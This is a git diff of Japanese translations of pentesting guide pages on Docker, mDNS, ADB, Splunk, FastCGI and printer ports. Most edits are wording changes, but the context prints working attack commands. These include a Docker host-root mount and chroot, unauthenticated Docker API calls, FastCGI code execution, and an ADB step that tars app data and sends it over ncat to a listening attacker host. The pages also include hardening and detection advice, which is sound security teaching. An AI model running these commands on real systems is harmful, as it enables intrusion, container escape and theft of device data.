+- [**containerd**](http://containerd.io): これはコンテナの**ライフサイクルの包括的な管理**を担当する**コアランタイム**です。これには、**イメージの転送とストレージ**の管理に加え、コンテナの**実行、監視、ネットワーキング**を監督することが含まれます。**containerdに関する詳細な情報**は**さらに探求されます**。
 - **container-shim**は、**ヘッドレスコンテナ**の処理において重要な役割を果たし、コンテナが初期化された後に**runc**からシームレスに引き継ぎます。
-- [**runc**](http://runc.io): **軽量で汎用的なコンテナランタイム**機能で評価されているruncは、**OCI標準**に準拠しています。これは、**OCIガイドライン**に従ってコンテナを**起動および管理する**ためにcontainerdによって使用され、元の**libcontainer**から進化しました。
-- [**grpc**](http://www.grpc.io)は、containerdと**docker-engine**間の**通信を促進**するために不可欠であり、**効率的な相互作用**を確保します。
+- [**runc**](http://runc.io): その**軽量で汎用的なコンテナランタイム**機能で評価されているruncは、**OCI標準**に準拠しています。これは、**OCIガイドライン**に従ってコンテナを**起動および管理する**ためにcontainerdによって使用され、元の**libcontainer**から進化しました。
+- [**grpc**](http://www.grpc.io)は、containerdと**docker-engine**間の**通信を促進する**ために不可欠であり、**効率的な相互作用**を確保します。
 - [**OCI**](https://www.opencontainers.org)は、ランタイムとイメージのための**OCI仕様**を維持する上で重要であり、最新のDockerバージョンは**OCIイメージおよびランタイム**標準の両方に**準拠しています**。
 
 #### 基本コマンド
@@ -43,7 +43,7 @@ docker system prune -a
 
 **Containerd**は、**DockerやKubernetes**などのコンテナプラットフォームのニーズに応えるために特別に開発されました。これは、Linux、Windows、Solarisなどのさまざまなオペレーティングシステムでのコンテナの実行を**簡素化すること**を目的としており、オペレーティングシステム固有の機能やシステムコールを抽象化します。Containerdの目標は、ユーザーに必要な基本的な機能のみを含め、不要なコンポーネントを省くことを目指しています。しかし、この目標を完全に達成することは困難であると認識されています。
 
-重要な設計上の決定は、**Containerdがネットワーキングを扱わない**ことです。ネットワーキングは分散システムにおいて重要な要素と見なされており、ソフトウェア定義ネットワーキング(SDN)やサービスディスカバリーなどの複雑さはプラットフォームによって大きく異なります。したがって、Containerdはサポートするプラットフォームにネットワーキングの管理を委ねています。
+重要な設計上の決定は、**Containerdがネットワーキングを扱わない**ことです。ネットワーキングは分散システムにおいて重要な要素と見なされており、ソフトウェア定義ネットワーキング(SDN)やサービスディスカバリーなどの複雑さは、プラットフォームによって大きく異なります。したがって、Containerdはサポートするプラットフォームにネットワーキングの管理を委ねています。
 
 **DockerがContainerdを利用して**コンテナを実行する一方で、ContainerdはDockerの機能のサブセットのみをサポートしていることに注意が必要です。具体的には、ContainerdはDockerに存在するネットワーク管理機能を欠いており、Dockerスウォームの作成を直接サポートしていません。この違いは、Containerdがコンテナランタイム環境としての焦点を絞った役割を持ち、統合するプラットフォームにより専門的な機能を委任していることを強調しています。
 ```bash
@@ -63,9 +63,9 @@ ctr container delete 
 ```
 #### Podman
 
-**Podman**は、Red Hatによって開発および維持されているオープンソースのコンテナエンジンで、[Open Container Initiative (OCI) standards](https://github.com/opencontainers)に準拠しています。Dockerとは異なり、**デーモンレスアーキテクチャ**や**ルートレスコンテナ**のサポートなど、いくつかの独自の機能があります。これにより、ユーザーはルート権限なしでコンテナを実行できます。
+**Podman**は、Red Hatによって開発および維持されているオープンソースのコンテナエンジンで、[Open Container Initiative (OCI) standards](https://github.com/opencontainers)に準拠しています。**デーモンレスアーキテクチャ**や**ルートレスコンテナ**のサポートなど、Dockerとは異なるいくつかの特徴があります。これにより、ユーザーはルート権限なしでコンテナを実行できます。
 
-PodmanはDockerのAPIと互換性があるように設計されており、Docker CLIコマンドを使用できます。この互換性は、コンテナイメージを構築するための**Buildah**や、プッシュ、プル、インスペクトなどのイメージ操作のための**Skopeo**などのツールを含むエコシステムにまで及びます。これらのツールの詳細は、[GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools)で確認できます。
+PodmanはDockerのAPIと互換性があるように設計されており、Docker CLIコマンドを使用できます。この互換性は、コンテナイメージを構築するための**Buildah**や、プッシュ、プル、インスペクトなどのイメージ操作のための**Skopeo**などのツールを含むエコシステムにまで及びます。これらのツールの詳細は、彼らの[GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools)で確認できます。
 
 **主な違い**
 
@@ -76,7 +76,7 @@ PodmanはDockerのAPIと互換性があるように設計されており、Docke
 Podmanのアプローチは、ユーザー権限管理と既存のDockerワークフローとの互換性を強調し、Dockerに対する安全で柔軟な代替手段を提供します。
 
 > [!TIP]
-> PodmanはDockerと同じAPIをサポートすることを目指しているため、次のようにPodmanでDockerと同じコマンドを使用できます:
+> podmanがdockerと同じAPIをサポートすることを目指しているため、以下のようにpodmanでdockerと同じコマンドを使用できます:
 >
 > ```bash
 > podman --version
@@ -87,7 +87,7 @@ Podmanのアプローチは、ユーザー権限管理と既存のDockerワー
 
 ### 基本情報
 
-リモートAPIは、デフォルトで2375ポートで実行されており、認証を必要としません。これにより、攻撃者は特権のあるDockerコンテナを起動できます。リモートAPIを使用することで、ホストの/(ルートディレクトリ)をコンテナにアタッチし、ホスト環境のファイルを読み書きできます。
+リモートAPIは、デフォルトで2375ポートで実行されており、これが有効になっている場合、サービスはデフォルトで認証を必要としません。これにより、攻撃者は特権のあるdockerコンテナを起動できます。リモートAPIを使用することで、ホストのルートディレクトリをコンテナにアタッチし、ホスト環境のファイルを読み書きできます。
 
 **デフォルトポート:** 2375
 ```
@@ -145,7 +145,7 @@ docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash
 ```
 **Curl**
 
-時々、**TLS** エンドポイントに **2376** が表示されます。docker クライアントで接続することはできませんでしたが、curl を使って接続することは可能です。
+時々、**TLS** エンドポイントに **2376** が表示されます。docker クライアントで接続することはできませんでしたが、curl を使用して接続することは可能です。
 ```bash
 #List containers
 curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
@@ -175,7 +175,7 @@ curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope
 #Delete stopped containers
 curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune
 ```
-この件についての詳細情報が必要な場合、コマンドをコピーした場所にさらに情報があります: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
+この件についての詳細情報が必要な場合、コマンドをコピーした場所に詳細情報があります: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/)
 
 #### 自動
 ```bash
@@ -212,7 +212,7 @@ docker inspect 
 - IPアドレス。
 - ポート。
 - パス。
-- その他…。
+- その他… 。
 
 ファイルを抽出したい場合:
 ```bash
@@ -226,7 +226,7 @@ docker cp :/etc/ 
 - `./docker-bench-security.sh`
 - 現在のdockerインストールを検査するために、ツール[https://github.com/kost/dockscan](https://github.com/kost/dockscan)を使用できます。
 - `dockscan -v unix:///var/run/docker.sock`
-- 異なるセキュリティオプションで実行されるコンテナの権限を確認するために、ツール[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)を使用できます。これは、コンテナを実行するためにいくつかのセキュリティオプションを使用することの影響を知るのに役立ちます:
+- 異なるセキュリティオプションで実行されるコンテナが持つ権限を確認するために、ツール[https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained)を使用できます。これは、コンテナを実行するためにいくつかのセキュリティオプションを使用することの影響を知るのに役立ちます:
 - `docker run --rm -it r.j3ss.co/amicontained`
 - `docker run --rm -it --pid host r.j3ss.co/amicontained`
 - `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
@@ -239,7 +239,7 @@ docker cp :/etc/ 
 
 #### Dockerfileのセキュリティ
 
-- あなたのDockerfileを**検査**し、あらゆる種類の誤設定を見つけるために、ツール[https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter)を使用できます。各誤設定にはIDが付与され、各誤設定の修正方法はここ[https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md)で見つけることができます。
+- あなたのDockerfileを**検査**し、あらゆる種類の誤設定を見つけるために、ツール[https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter)を使用できます。各誤設定にはIDが付与され、ここ[https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md)でそれぞれの修正方法を見つけることができます。
 - `dockerfilelinter -f Dockerfile`
 
 ![](<../images/image (176).png>)
diff --git a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
index a29798adb..d95d4d25b 100644
--- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
+++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md
@@ -59,7 +59,7 @@ sudo tshark -i  -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-s
 
 ### mDNS 名プロービング干渉 (DoS / 名前の占有)
 
-プロービングフェーズ中、ホストは名前のユニーク性を確認します。偽の競合で応答することで、新しい名前を選択させるか、失敗させることができます。これにより、サービスの登録や発見が遅れるか、妨げられる可能性があります。
+プロービングフェーズ中、ホストは名前のユニーク性をチェックします。偽の競合で応答することで、新しい名前を選択させるか、失敗させることができます。これにより、サービスの登録や発見が遅れるか、妨げられる可能性があります。
 
 Pholus の例:
 ```bash
@@ -71,7 +71,7 @@ sudo python3 pholus3.py  -afre -stimeout 1000
 広告されたDNS-SDサービス(プリンター、AirPlay、HTTP、ファイル共有)をなりすまし、クライアントをあなたに接続させる。これは特に以下の目的に役立ちます:
 - _ipp._tcpまたは_printer._tcpをスプーフィングして文書をキャプチャする。
 - クライアントをHTTP/HTTPSサービスに誘導し、トークン/クッキーを収集したり、ペイロードを配信したりする。
-- Windowsクライアントがなりすましサービスに対して認証を交渉する際に、NTLMリレー技術と組み合わせる。
+- Windowsクライアントがスプーフィングされたサービスに対して認証を交渉する際に、NTLMリレー技術と組み合わせる。
 
 bettercapのzerogodモジュール(mDNS/DNS-SDスプーファー/なりすまし):
 ```bash
@@ -92,31 +92,31 @@ sudo bettercap -iface  -eval "zerogod.discovery on"
 > zerogod.save 192.168.1.42 target.yml
 > zerogod.advertise target.yml
 ```
-また、一般的なLLMNR/NBNS/mDNS/WPADスプーフィングおよび認証情報キャプチャ/リレーのワークフローを参照してください:
+Also see generic LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:
 
 {{#ref}}
 ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
 {{#endref}}
 
-### 最近の実装問題に関する注意事項(エンゲージメント中のDoS/持続性に役立つ)
+### 最近の実装問題に関するノート(エンゲージメント中のDoS/持続性に役立つ)
 
-- Avahiのreachable-assertionおよびD-Busクラッシュバグ(2023)は、Linuxディストリビューション上でavahi-daemonを終了させる可能性があり(例:CVE-2023-38469..38473、CVE-2023-1981)、ターゲットホストでのサービス発見を再起動まで妨げます。
-- Cisco IOS XE Wireless LAN ControllerのmDNSゲートウェイDoS(2024、CVE-2024-20303)は、隣接する攻撃者が高いCPU負荷を引き起こし、APを切断させることを可能にします。VLAN間にmDNSゲートウェイがある場合、誤った形式または高レートのmDNSの下での安定性に注意してください。
+- Avahi reachable-assertionおよびD-Busクラッシュバグ(2023)は、Linuxディストリビューション上でavahi-daemonを終了させる可能性があり(例:CVE-2023-38469..38473、CVE-2023-1981)、ターゲットホストでのサービス発見を再起動まで妨げます。
+- Cisco IOS XE Wireless LAN Controller mDNSゲートウェイDoS(2024、CVE-2024-20303)は、隣接する攻撃者が高いCPU負荷を引き起こし、APを切断させることを可能にします。VLAN間にmDNSゲートウェイがある場合、誤った形式または高レートのmDNSの下での安定性に注意してください。
 
 ## 防御的考慮事項とOPSEC
 
-- セグメント境界:mDNSゲートウェイが明示的に必要でない限り、セキュリティゾーン間で224.0.0.251/FF02::FBをルーティングしないでください。発見をブリッジする必要がある場合は、ホワイトリストとレート制限を優先してください。
+- セグメント境界:セキュリティゾーン間で224.0.0.251/FF02::FBをルーティングしないでください。mDNSゲートウェイが明示的に必要な場合を除きます。発見をブリッジする必要がある場合は、ホワイトリストとレート制限を優先してください。
 - Windowsエンドポイント/サーバー:
 - mDNSによる名前解決を完全に無効にするには、レジストリ値を設定し、再起動します:
 ```
 HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
 ```
-- 管理された環境では、Windows Defenderファイアウォールの組み込み「mDNS (UDP-In)」ルールを無効にして(少なくともドメインプロファイルで)、ホーム/ローミング機能を保持しながら、mDNSの受信処理を防ぎます。
-- 新しいWindows 11ビルド/GPOテンプレートでは、「コンピュータの構成 > 管理用テンプレート > ネットワーク > DNSクライアント > マルチキャストDNS (mDNS) プロトコルの構成」というポリシーを使用し、無効に設定します。
-- Linux (Avahi):
+- 管理された環境では、Windows Defender Firewallの組み込み「mDNS (UDP-In)」ルールを無効にして(少なくともドメインプロファイルで)、インバウンドmDNS処理を防ぎつつ、ホーム/ローミング機能を保持します。
+- 新しいWindows 11ビルド/GPOテンプレートでは、「コンピュータの構成 > 管理用テンプレート > ネットワーク > DNSクライアント > マルチキャストDNS (mDNS) プロトコルの構成」を使用し、無効に設定します。
+- Linux(Avahi):
 - 不要な場合は公開を制限します:`disable-publishing=yes`を設定し、`/etc/avahi/avahi-daemon.conf`内の`allow-interfaces=` / `deny-interfaces=`でインターフェースを制限します。
-- `check-response-ttl=yes`を検討し、厳密に必要でない限り`enable-reflector=yes`を避けます。反射時には`reflect-filters=`ホワイトリストを優先してください。
-- macOS:特定のサブネットに対してBonjour発見が不要な場合、ホスト/ネットワークファイアウォールで受信mDNSを制限します。
+- `check-response-ttl=yes`を検討し、厳密に必要でない限り`enable-reflector=yes`を避けます。反射時には`reflect-filters=`ホワイトリストを優先します。
+- macOS:特定のサブネットに対してBonjour発見が不要な場合、ホスト/ネットワークファイアウォールでインバウンドmDNSを制限します。
 - 監視:`_services._dns-sd._udp.local`クエリの異常な急増や重要なサービスのSRV/TXTの突然の変化に警告します。これらはスプーフィングやサービスのなりすましの指標です。
 
 ## ツールのクイックリファレンス
@@ -124,7 +124,7 @@ HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD
 - nmap NSE: `dns-service-discovery`および`broadcast-dns-service-discovery`。
 - Pholus: アクティブスキャン、逆mDNSスイープ、DoSおよびスプーフィングヘルパー。
 ```bash
-# パッシブスニッフィング(タイムアウト秒)
+# パッシブスニッフ(タイムアウト秒)
 sudo python3 pholus3.py  -stimeout 60
 # サービスタイプを列挙
 sudo python3 pholus3.py  -sscan
@@ -137,8 +137,8 @@ sudo python3 pholus3.py  -rdns_scanning 192.168.2.0/24
 
 ## スプーフィング/MitM
 
-このサービス上で実行できる最も興味深い攻撃は、クライアントと実際のサーバー間の通信でMitMを実行することです。機密ファイル(プリンターとの通信をMitM)や認証情報(Windows認証)を取得できる可能性があります。\
-詳細については、次を確認してください:
+このサービス上で実行できる最も興味深い攻撃は、クライアントと実際のサーバー間の通信でMitMを実行することです。機密ファイル(プリンターとの通信をMitM)や資格情報(Windows認証)を取得できる可能性があります。\
+詳細については確認してください:
 
 {{#ref}}
 ../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md
index 2d3eda136..4f7b3b040 100644
--- a/src/network-services-pentesting/5439-pentesting-redshift.md
+++ b/src/network-services-pentesting/5439-pentesting-redshift.md
@@ -6,7 +6,8 @@
 
 このポートは**Redshift**が実行するために使用されます。基本的には**PostgreSQL**のAWSバリエーションです。
 
-詳細については、以下を確認してください:
+詳細については確認してください:
+
 
 {{#ref}}
 https://cloud.hacktricks.wiki/en/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html
diff --git a/src/network-services-pentesting/5555-android-debug-bridge.md b/src/network-services-pentesting/5555-android-debug-bridge.md
index 544793020..de46a471a 100644
--- a/src/network-services-pentesting/5555-android-debug-bridge.md
+++ b/src/network-services-pentesting/5555-android-debug-bridge.md
@@ -9,7 +9,7 @@ From [the docs](https://developer.android.com/studio/command-line/adb):
 Android Debug Bridge (adb) は、Androidベースのデバイスやエミュレーターと通信するためのコマンドラインツールです。典型的なアクションには、パッケージのインストール、デバッグ、およびデバイス上でのインタラクティブなUnixシェルの取得が含まれます。
 
 - 歴史的なデフォルトTCPポート: 5555 (クラシックな "adb tcpip" モード)。
-- 現代のワイヤレスデバッグ (Android 11+) は、TLSペアリングとmDNSサービス発見を使用します。接続ポートは動的で、mDNSを介して発見されます; 5555でない場合もあります。ペアリングは、adb pair host:port の後に adb connect を使用して行います。攻撃的な影響については、以下のノートを参照してください。
+- 現代のワイヤレスデバッグ (Android 11+) は、TLSペアリングとmDNSサービス発見を使用します。接続ポートは動的で、mDNSを介して発見されます; 5555でない場合があります。ペアリングは、adb pair host:port の後に adb connect を使用して行います。攻撃的な影響については、以下のノートを参照してください。
 
 Example nmap fingerprint:
 ```
@@ -26,10 +26,10 @@ adb shell                      # Get an interactive shell (uid usually shell)
 whoami; id; getprop ro.debuggable ro.secure service.adb.tcp.port
 adb root || true               # Works on eng/userdebug/insecure builds, many emulators/IoT
 ```
-- デバイスがADB認証を強制する場合 (ro.adb.secure=1)、事前に認証されている必要があります (USB RSA認証) またはAndroid 11以上のワイヤレスデバッグペアリングを使用する必要があります (これはデバイスに表示される一時コードが必要です)。
+- デバイスがADB認証を強制する場合 (ro.adb.secure=1)、事前に認証されている必要があります (USB RSA認証) またはAndroid 11以上のワイヤレスデバッグペアリングを使用する必要があります (これはデバイスに表示される一度限りのコードが必要です)。
 - 一部のベンダーイメージ、エンジニアリング/ユーザーデバッグビルド、エミュレーター、テレビ、STB、および開発キットは、認証なしでadbdを公開するか、adbdがルートとして実行されます。その場合、通常はシェルまたはルートシェルに直接入ります。
 
-一般的なADBコマンドのリファレンスについては、次を参照してください:
+一般的なADBコマンドのリファレンスについては、次を参照してください:
 
 {{#ref}}
 ../mobile-pentesting/android-app-pentesting/adb-commands.md
@@ -37,7 +37,7 @@ adb root || true               # Works on eng/userdebug/insecure builds, many em
 
 ## クイックポストエクスプロイテーション
 
-シェルを取得したら、権限とSELinuxコンテキストを検証します:
+シェルを取得したら、権限とSELinuxコンテキストを検証します:
 ```bash
 id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint
 ```
@@ -48,7 +48,7 @@ id; getenforce; getprop ro.build.type ro.product.model ro.build.fingerprint
 pm list packages -3
 pm path 
 ```
-- ルート権限がある場合(adb root または su が機能します)、/data に直接アクセスできます。そうでない場合は、デバッグ可能なアプリには run-as を使用してください:
+- ルート権限がある場合(adb rootまたはsuが機能します)、/dataに直接アクセスできます。そうでない場合は、デバッグ可能なアプリにはrun-asを使用してください:
 ```bash
 # ルートなしで、デバッグ可能なアプリの場合
 run-as  sh -c 'cd /data/data/ && tar cf - .' | tar xf - -C ./loot/
@@ -59,17 +59,17 @@ exit
 adb pull "/sdcard/"
 ```
 - 有用なシステムアーティファクト(ルートが必要):
-- /data/system/users/0/accounts.db および関連する AccountManager データ
-- /data/misc/wifi/ (古いバージョンのネットワーク設定/キー)
-- /data/data/ のアプリ固有の SQLite DB と shared_prefs
+- /data/system/users/0/accounts.dbおよび関連するAccountManagerデータ
+- /data/misc/wifi/(古いバージョンのネットワーク設定/キー)
+- /data/data/のアプリ固有のSQLite DBおよびshared_prefs
 
-これを使用して、機密情報(例: アプリの秘密)を取得できます。Chrome データに関する考慮事項についてのメモは、[こちら](https://github.com/carlospolop/hacktricks/issues/274)で参照してください。
+これを使用して、機密情報(例:アプリの秘密)を取得できます。Chromeデータに関する考慮事項についてのメモは、[こちら](https://github.com/carlospolop/hacktricks/issues/274)で参照してください。
 
 ### コード実行とペイロード配信
 
 - ランタイム権限をインストールして自動付与:
 ```bash
-adb install -r -g payload.apk         # -g はマニフェストで宣言されたすべてのランタイム権限を付与します
+adb install -r -g payload.apk         # -gはマニフェストで宣言されたすべてのランタイム権限を付与します
 adb shell monkey -p  -c android.intent.category.LAUNCHER 1
 ```
 - アクティビティ/サービス/ブロードキャストを直接開始:
@@ -81,28 +81,28 @@ adb shell am broadcast -a 
 
 ### ポートフォワーディングとピボッティング
 
-ルートなしでも、adb はローカルポートをデバイスポートに、またその逆にフォワードできます。これは、デバイス上でローカルにバインドされたサービスにアクセスしたり、攻撃者のサービスをデバイスに公開したりするのに便利です。
+ルートなしでも、adbはローカルポートをデバイスポートに転送できますし、その逆も可能です。これは、デバイス上でローカルにバインドされたサービスにアクセスしたり、攻撃者のサービスをデバイスに公開したりするのに便利です。
 
-- ホスト->デバイスをフォワード(ホストからデバイスのローカルサービスにアクセス):
+- ホスト->デバイスを転送(ホストからデバイスのローカルサービスにアクセス):
 ```bash
-adb forward tcp:2222 tcp:22       # デバイスが SSH を実行している場合(例: Termux/Dropbear)
+adb forward tcp:2222 tcp:22       # デバイスがSSHを実行している場合(例:Termux/Dropbear)
 adb forward tcp:8081 tcp:8080     # アプリのローカルデバッグサーバーを公開
 ```
-- デバイス->ホストをリバース(デバイスがホスト上のサービスにアクセスできるようにする):
+- デバイス->ホストを逆転送(デバイスがホスト上のサービスにアクセスできるようにする):
 ```bash
-adb reverse tcp:1080 tcp:1080     # デバイスアプリは now host:1080 に 127.0.0.1:1080 としてアクセスできます
+adb reverse tcp:1080 tcp:1080     # デバイスアプリは今、ホスト:1080に127.0.0.1:1080としてアクセスできます
 ```
-- ソケット経由でのファイル抽出(sdcard 書き込みなし):
+- ソケットを介したファイルの抽出(sdcardへの書き込みなし):
 ```bash
-# ホスト上: リッスン
+# ホストで: リッスン
 ncat -lvp 9000 > dump.tar
-# デバイス上: ディレクトリを tar として送信(ルートまたは run-as が適用される)
+# デバイスで: ディレクトリをtarとして送信(ルートまたはrun-asが適用される)
 adb shell "tar cf - /data/data/" | ncat  9000
 ```
 
-## ワイヤレスデバッグ (Android 11+)
+## ワイヤレスデバッグ(Android 11+)
 
-最新の Android は、デバイス側のペアリングと mDNS 発見を伴う TLS 保護されたワイヤレスデバッグを実装しています:
+最新のAndroidは、デバイス側のペアリングとmDNS発見を使用したTLS保護されたワイヤレスデバッグを実装しています:
 ```bash
 # On the device: Developer options -> Wireless debugging -> Pair device with pairing code
 # On attacker host (same L2 network, mDNS allowed):
@@ -115,16 +115,16 @@ adb connect :
 - _adb-tls-pairing._tcp (ペアリング)
 - _adb-tls-connect._tcp (ペア接続)
 - _adb._tcp (レガシー/プレーン)
-- mDNSがフィルタリングされている場合、古典的なUSB支援による有効化が一部のビルドでまだ機能する可能性があります: `adb tcpip 5555` その後 `adb connect :5555` (再起動まで)。
+- mDNSがフィルタリングされている場合、古典的なUSB支援による有効化が一部のビルドでまだ機能する可能性があります:`adb tcpip 5555` その後 `adb connect :5555` (再起動まで)。
 
-攻撃的な含意:デバイスのUIと対話できる場合(例:物理的アクセスまたはモバイルMDMの誤設定)にワイヤレスデバッグを有効にし、ペアリングコードを表示できると、ケーブルなしで長期間のペアADBチャネルを確立できます。一部のOEMは、ペアリングなしでエンジニアリング/開発イメージでTCP経由のADBを公開しています—常に確認してください。
+攻撃的な含意:デバイスのUIと対話できる場合(例:物理的アクセスまたはモバイルMDMの誤設定)にワイヤレスデバッグを有効にし、ペアリングコードを表示できれば、ケーブルなしで長期間のペアADBチャネルを確立できます。一部のOEMは、ペアリングなしでエンジニアリング/開発イメージでTCP経由のADBを公開しています—常に確認してください。
 
 ## ハードニング / 検出
 
 防御者は、到達可能なadbd(TCP)が重大なリスクであると仮定すべきです。
 
 - 不要な場合はADBとワイヤレスデバッグを無効にしてください。開発者オプションでUSBデバッグの認証を取り消してください。
-- 信頼できないセグメントでのTCP/5555の受信とmDNSベースのADB発見をブロックするネットワークポリシーを確保してください。
+- 信頼できないセグメントでのTCP/5555の受信およびmDNSベースのADB発見をブロックするネットワークポリシーを確保してください。
 - あなたの管理下にあるデバイスで:
 ```bash
 settings put global adb_enabled 0
@@ -132,7 +132,7 @@ setprop service.adb.tcp.port -1   # TCPリスニングを無効にする(ま
 stop adbd; start adbd             # デーモンを再起動
 ```
 - 企業ネットワークでのmDNSレコード `_adb._tcp`、`_adb-tls-connect._tcp`、`_adb-tls-pairing._tcp` を監視し、予期しない5555リスナーに対してアラートを出してください。
-- 不安全なビルドのインベントリ: `getprop ro.debuggable`、`ro.build.type`、および `ro.adb.secure`。
+- 不安全なビルドのインベントリ:`getprop ro.debuggable`、`ro.build.type`、および `ro.adb.secure`。
 
 ## Shodan
 
diff --git a/src/network-services-pentesting/8089-splunkd.md b/src/network-services-pentesting/8089-splunkd.md
index f256dffc9..3af243ac0 100644
--- a/src/network-services-pentesting/8089-splunkd.md
+++ b/src/network-services-pentesting/8089-splunkd.md
@@ -4,7 +4,7 @@
 
 ## **基本情報**
 
-- データ収集、分析、可視化のためのログ分析ツール
+- データ収集、分析、可視化に使用されるログ分析ツール
 - セキュリティ監視やビジネス分析で一般的に使用される
 - デフォルトポート:
 - ウェブサーバー: 8000
@@ -33,12 +33,12 @@
 - スクリプト入力
 - アラートスクリプト
 - クロスプラットフォームサポート (Windows/Linux)
-- スクリプト入力は以下を実行できる:
+- スクリプト入力は実行可能:
 - Bashスクリプト
 - PowerShellスクリプト
 - バッチスクリプト
 
-主要な悪用の可能性:
+重要な悪用の可能性:
 
 - 機密データの保存
 - 無料版の認証の欠如
@@ -57,7 +57,7 @@ Splunkは、カスタムアプリケーションの展開を通じてリモー
 
 カスタムアプリケーションは**Python、Batch、Bash、またはPowerShellスクリプト**を実行できます。さらに、**SplunkにはPythonがインストールされている**ため、**Windows**システムでもPythonコードを実行できます。
 
-[**この**](https://github.com/0xjpuff/reverse_shell_splunk)例を使用することができ、**`bin`**には[Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py)と[PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1)の例が含まれています。または、自分自身で作成することもできます。
+[**この**](https://github.com/0xjpuff/reverse_shell_splunk)例を使用して、[Python](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/rev.py)と[PowerShell](https://github.com/0xjpuff/reverse_shell_splunk/blob/master/reverse_shell_splunk/bin/run.ps1)の例を含む**`bin`**を作成できます。または、自分自身で作成することもできます。
 
 悪用プロセスは、プラットフォーム全体で一貫した方法論に従います:
 ```
diff --git a/src/network-services-pentesting/9000-pentesting-fastcgi.md b/src/network-services-pentesting/9000-pentesting-fastcgi.md
index 304a28228..6d08488ad 100644
--- a/src/network-services-pentesting/9000-pentesting-fastcgi.md
+++ b/src/network-services-pentesting/9000-pentesting-fastcgi.md
@@ -1,6 +1,8 @@
+# 9000 Pentesting FastCGI
+
 {{#include ../banners/hacktricks-training.md}}
 
-# 基本情報
+## 基本情報
 
 **FastCGIとは何かを学びたい**場合は、以下のページを確認してください:
 
@@ -8,9 +10,9 @@
 pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md
 {{#endref}}
 
-デフォルトでは、**FastCGI**は**ポート****9000**で実行され、nmapでは認識されません。**通常**、FastCGIは**localhost**のみでリッスンします。
+デフォルトでは、**FastCGI**は**ポート****9000**で実行され、nmapでは認識されません。**通常**、FastCGIは**localhost**のみにリッスンします。
 
-# RCE
+## RCE
 
 FastCGIに任意のコードを実行させるのは非常に簡単です:
 ```bash
@@ -32,6 +34,6 @@ cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT
 cat $OUTPUT
 done
 ```
-次のPythonスクリプトを使用することもできます: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
+また、次のPythonスクリプトを使用することもできます: [https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75](https://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/9100-pjl.md b/src/network-services-pentesting/9100-pjl.md
index f4dbcee6e..54b4f82a4 100644
--- a/src/network-services-pentesting/9100-pjl.md
+++ b/src/network-services-pentesting/9100-pjl.md
@@ -1,18 +1,20 @@
+# 9100/tcp - PJL (Printer Job Language)
+
 {{#include ../banners/hacktricks-training.md}}
 
-# 基本情報
+## 基本情報
 
-From [here](http://hacking-printers.net/wiki/index.php/Port_9100_printing): Raw printingは、ネットワークプリンターのポート9100/tcpに接続するプロセスとして定義されます。これは、CUPSおよびWindows印刷アーキテクチャがネットワークプリンターと通信するために使用するデフォルトの方法であり、'_プリンター用の最もシンプルで、最も速く、一般的に最も信頼性の高いネットワークプロトコル_'と見なされています。Raw port 9100 printingは、JetDirect、AppSocket、またはPDL-datastreamとも呼ばれ、実際には**印刷プロトコルそのものではありません**。代わりに、**送信されるすべてのデータは印刷デバイスによって直接処理されます**。これは、TCPを介した並列接続のように機能します。LPD、IPP、SMBとは対照的に、これはクライアントに直接フィードバックを送信でき、ステータスやエラーメッセージを含みます。このような**双方向チャネル**は、**PJL**、**PostScript**、または**PCL**コマンドの**結果**に直接**アクセス**を提供します。したがって、ほぼすべてのネットワークプリンターでサポートされているraw port 9100 printingは、PRETおよびPFTを使用したセキュリティ分析のためのチャネルとして使用されます。
